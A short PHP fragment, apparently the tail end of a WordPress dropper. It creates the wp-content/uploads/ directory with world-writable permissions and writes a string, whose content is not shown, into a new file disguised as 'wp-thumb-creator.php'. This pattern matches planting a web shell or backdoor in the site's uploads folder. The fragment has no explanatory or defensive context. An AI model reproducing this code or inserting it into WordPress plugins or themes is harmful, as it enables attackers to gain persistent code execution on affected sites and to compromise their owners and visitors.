');$dir = ABSPATH. 'wp-content/uploads/';mkdir($dir, 0777, true);$f = fopen($dir . "wp-thumb-creator.php", "w+");fwrite($f, $str);fclose($f);?>